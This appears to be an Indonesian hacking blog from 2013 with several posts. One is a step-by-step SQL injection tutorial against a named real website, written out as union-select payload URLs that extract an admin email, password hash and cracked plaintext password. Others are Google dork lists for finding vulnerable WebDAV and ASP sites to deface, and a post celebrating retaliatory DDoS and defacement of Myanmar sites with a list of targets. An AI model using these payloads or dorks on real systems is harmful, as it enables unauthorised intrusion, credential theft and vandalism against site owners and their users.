Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Tuesday, 5 March 2013

Tutorial SQL Injection

Pertama cari target yg mengandung bug's atau situs" vuln...
Disini target kita adalah " http://www.dpsmbd.com "

Ket: Bisa juga dengan ?id=1...
Setelah itu mulai mencari jumlah urutan table dengan order by ( dalam beberapa kasus order by tidak akan berfungsi...)
Contoh :
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 2--
Jika situs masih tampak normal silahkan lanjutkan sampai menemui halaman yg error.

Misalkan :
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 2--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 3--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 4--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 5--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 6--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 7--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 8--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 9--
http://www.dpsmbd.com/newsdetail.php?id=-1 order by 10--

Ket: Gak perlu ngurut... di loncat2 juga bisa yg penting ketemu pertemuan antara error dan tidak pas dimana...
Selanjutnya melakukan colomn count dengan UNION SELECT menggunakan angka hingga keluar daftar angka didalam situs tersebut....

Contoh :
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6,7--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6,7,8--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,3,4,5,6,7,8,9--

Ket: Anda bisa sebenar'a langsung ke union select 1,2,3,4,5,6,7,8,9--
Karena order by yang tadi dilakukan sampai angka 9 sebelum terjadi error'a....
Setelah tau angka apa saja yg keluar setelah melakukan column count, kita tinggal mencari daftar table'a...dan menaruh group_concat(table_name) di urutan nomor yg tadi keluar di web tersebut...

Dan menaruh "from information_schema.tables where table_schema=database()--" diakhir angka " berarti 9 "......

Contoh :
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
Jika keluar daftar table'a...pilihlah table mana yg ingin kita exploitasi...Misalkan kita pilih table "admin"
untuk mencari nama kolom didalam table admin, terlebih dahulu kita merubah/meng convert text "admin" kedalam Hexadecimal
Ke situs http://www.string-functions.com/string-hex.aspx
hasil hex dari admin = 61646d696e setiap hexadecimal diawali dengan 0x...dan menjadi 0x61646d696e

Lalu tambahkan
limit 1,1--
limit 2,1--
limit 3,1--
limit 4,1--

Fungsi'a untuk mengetahui nama kolom dari table yang dimaksud.

Contoh:
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 1,1--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 2,1--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 3,1--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e limit 4,1--



Berikut nama2 kolom dari hasil exploitasi..

limit 1,1--
limit 2,1--
limit 3,1--
limit 4,1--
Yang akan kita exploitasi selanjutnya adalah isi dari nama kolom " user_name " dan " pass_word "
Contoh :

http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,group_concat(user_name,0x3a,pass_word),4,5,6,7,8,9 from admin--
Atau bisa juga satu per satu dengan cara memisahkan nama kolom
Contoh:
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,user_name,4,5,6,7,8,9 from admin--
http://www.dpsmbd.com/newsdetail.php?id=-1 union select 1,2,pass_word,4,5,6,7,8,9 from admin--

Maka keluarlah isi dari kolom tersebut, dengan isi :
superadmin@dps.com:44771849be55a878c9651a1794308cf5 yang berarti :
user_name = superadmin@dps.com
pass_word = 44771849be55a878c9651a1794308cf5

Karna password'a masih berbentuk hash...maka anda decrypt terlebih dahulu hash tersebut ke http://www.md5decrypter.co.uk/ dan akan ditemukan hasil'a menjadi :
Password = DPSmbd

Setelah mengetahui username dan password'a, tugas anda selanjutnya adalah mencari login page admin dari situs tersebut.
Silahkan gunakan tool finder page admin atau menggunakan jasa online ke http://sc0rpion.ir/af/
NB : Tehnik diatas tidaklah baku dan bersifat prosedural....kalian bisa menggunakan cara lain.....

Wednesday, 27 February 2013

Daftar Dork Webdav

Dork mungkin berguna untuk kita (Newbie Defacer).
Budayakan berkomentar, atau berikan umpan balik.

intitle:"Directory Listing For /" + inurl:webdav tomcat
intitle:"Directory Listing For /" + inurl:webdav

inurl:*.edu/*.asp
inurl:.gov.*/*.asp
inurl:*.gov/*.asp
inurl:.org/*.asp
inurl:.ag/*.asp
inurl:.it/*.asp
inurl:.uk/*.asp
inurl:.co.il/*.asp
inurl:.com/*.asp
inurl:.co.id/*.asp
inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js.cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp
inurl:.zj.cn/*.asp
inurl:.ac.cn/*.asp
inurl:.com.cn/*.asp
inurl:.edu.cn/*.asp
inurl:.gov.cn/*.asp
inurl:.net.cn/*.asp
inurl:.org.cn/*.asp
Antah Berantah

Sunday, 10 February 2013

Cyber War Hacker Indonesia vs Hacker Myanmar


Inilah dalang Grup yang telah meretas Situs situs indonesia. -> http://www.blinkhackergroup.org/
Tapi sayang, website itu type DNS nya .blogspot
Lebih lengkap lihat disini




Serangan serempak telah dilakukan oleh Hacker Indonesia ke ISP dan website-website Myanmar, di karenakan ini adalah bentuk kepedulian Hacker Indonesia dengan apa yang telah di lakukan oleh Hacker Myanmar yang telah merusak website - website Indoensia. Hacker Indonesia berjuang untuk membelah MARTABAT, dan HARGA DIRI BANGSA INDONESIA yang telah di lecehkan oleh negara lain. Disaat 230 situs Indonesia bahkan lebih dihajar oleh Myanmar, siapakah yang membalas ?

Apakah polisi cyber Indonesia ? Apakah pemerintah Indonesia ? Tidak ! Hacker lah yang dengan gigih menjunjung tinggi derajat bangsa ini dengan melakukan gerakan OP Myanmar. Tanpa digaji pun hacker Indonesia akan bahu membahu membalas serangan yang dilakukan oleh Myanmar ! Seperti yang kita ketahui, Myanmar sangat mudah melakukan aksi deface masal ke situs Indonesia karena mereka difasiliatsi untuk itu. Maksudnya ? Ya, situs Indonesia sangat banyak. Jelas sangat mudah jika hanya mencari bug dan kemudian melakukan symlink. Di Indonesia ada google.co.id yang memudahkan mereka melakukan scan terhadap web target. Bandingkan dengan mereka ! Situs Myanmar sedikit ! Di sana tidak ada situs google ! Sangat sulit jika harus masuk lewat celah keamanan ! Oleh karena itu, diputuskan malam ini DDoSer Indonesia akan melakukan balasan dengan meratakan situs-situs Myanmar secara bersama-sama...


Beberapa serangan telah di lancarkan ke negara Myanmar, di bawah ini list website Myanmar yang sudah pernah down, di deface, hacked, dan 404.
  • ais.gov.mm
  • amd.moai.gov.mm
  • asiaholidays.com.mm
  • asialight.com.mm
  • asianskytravels.com
  • asiantrails.com.mm
  • asianwingsairways.com.mm
  • cbm.gov.mm
  • city.com.mm
  • cnj.net.mm
  • commerce.gov.mm
  • consultancy.com.mm
  • cosco.com.mm
  • ct.com.mm
  • daewooenp.com.mm
  • dar.moai.gov.mm
  • dca.gov.mm
  • earth.com.mm
  • eleven.com.mm
  • elibrary.com.mm
  • enjoy.net.mm
  • forex.cbm.gov.mm
  • forum.myanmarfrangipanitours.com
  • geocomp-myanmar.net.mm
  • globalnet.com.mm
  • globalsongroup.com
  • gmrockentgroup.com
  • hantharwaddy.net.mm
  • hotel-tourism.gov.mm
  • indiaembassy.net.mm
  • industry2.gov.mm
  • irdmyanmar.gov.mm
  • irrigation.gov.mm
  • irrigation.gov.mm
  • isy.net.mm
  • kmd.com.mm
  • madb.moai.gov.mm
  • mail4u.com.mm
  • mailtx.teleport.net.mm
  • marychapman-mm.org
  • mbl.com.mm
  • mcpa.org.mm
  • mes.org.mm
  • micde.moai.gov.mm
  • mining.com.mm
  • mit.com.mm
  • mmmc.edu.mm
  • mnped.gov.mm
  • moc.gov.mm
  • mofr.gov.mm
  • mosports.gov.mm
  • mot.gov.mm
  • mpa.gov.mm
  • mprlnet.com.mm
  • mptmail.com.mm
  • mptmail.net.mm
  • mptsat.com.mm
  • mwd.com.mm
  • myanmar.com.mm
  • myanmar.gov.mm
  • myanmar.net.mm
  • myanmarbizdirectory.com
  • myanmarfishexporter.com
  • myanmarnlp.org.mm
  • myanmaronline.com.mm
  • myanmaronline.net.mm
  • myanmartradenet.com.mm
  • myanmartravelguides.com
  • myanmatimber.com.mm
  • myanpay.net.mm
  • myantel.net.mm
  • myringtune.com.mm
  • myringtuneonline.com.mm
  • nebula.com.mm
  • nestlemyanmar.com.mm
  • nic.net.mm
  • npt.net.mm
  • ns4.nic.net.mm
  • opal.net.mm
  • people.com.mm
  • planet.com.mm
  • pomail.gov.mm
  • president-office.gov.mm
  • primeboss.com.mm
  • redlink.net.mm
  • redlinkcare.net.mm
  • royalgoldentortoise.com
  • royalwhisky.net.mm
  • rpmm.com.mm
  • rubyland.com.mm
  • sb.gov.mm
  • sd.moai.gov.mm
  • spa.com.mm
  • sunfar.com.mm
  • super.com.mm
  • talentsnmodels.com
  • talisman.com.mm
  • tawwincentre.com.mm
  • teleport.net.mm
  • thaiairways.com.mm
  • tinaungzawtrading.com
  • tinmoelwin.com
  • tnk.net.mm
  • todaygroup.com.mm
  • tourmandalay.com.mm
  • ucsb.gov.mm
  • umfcci.com.mm
  • ummg.edu.mm
  • webasaservice.com
  • webmail.mm.com
  • wimaxmail.net.mm
  • wpiteam.net.mm
  • wrud.moai.gov.mm
  • yangtse.com.mm
  • yatanarponca.com.mm
  • yau.moai.gov.mm
  • yomabank.com.mm
  • zte.com.mm

Tuesday, 29 January 2013

Cara Mencari Website yang Vuln Terhadap Webdav

Sekarang akan kita bahas tentang cara mencari web yang webdav vulnerability, caranya sangat mudah seperti biasa kita gunakan Google Dork untuk mencari web target. Ini dia Dork Webdav yang bisa kita coba:
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
  • intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:YOURCOUNTRY (misal: my, us, th. dll)
Kita cari web target dengan memasukan Dork diatas kedalam pencarian Google, jika sudah keluar hasil penelusuranya kita tinggal pilih target dari hasil yang sudah ditampilkan google tadi. Caranya pada alamat url web target kita ketikan kata /webdav. Contoh: http://www.WEBTARGET.com/webdav
Jika muncul halaman yang bertuliskan “WebDAV testpage”, berarti web tersebut dapat kita hack.

Contoh: 

Namun biar pun muncul tulisan WebDAV testpage tetapi saja Not vulnerable dav, itu berarti sudah di patch oleh admin. Tindakan selanjutnya cari target lain.

Pengertian Web Deface

Deface adalah kegiatan mengganti atau pun merubah tampilan halaman depan sebuah situs, dan tentunya proses tersebut dilakukan dengan memanfaatkan kelemahan yang ada pada sebuah situs yang ditargetkan. 

Kegiatan Deface dilakukan oleh orang lain lain tanpa izin dari admin web tersebut (ilegal). Deface lebih sering dilakukan oleh para hacker hanya untuk iseng saja demi mendapatkan pengakuan prestasi dari Defacer lain, atau juga untuk memutuskan akses menuju website tersebut dengan mengubah tampilannya. 

Deface juga dapat menjadi kegiatan yang positif untuk mengingatkan admin bahwa sistem keamanan website trsebut lemah, atau juga menghentikan akses pengguna internet pada situs yg berisi konten negatif. 



By Antah Berantah


By Sekelebat Menghilang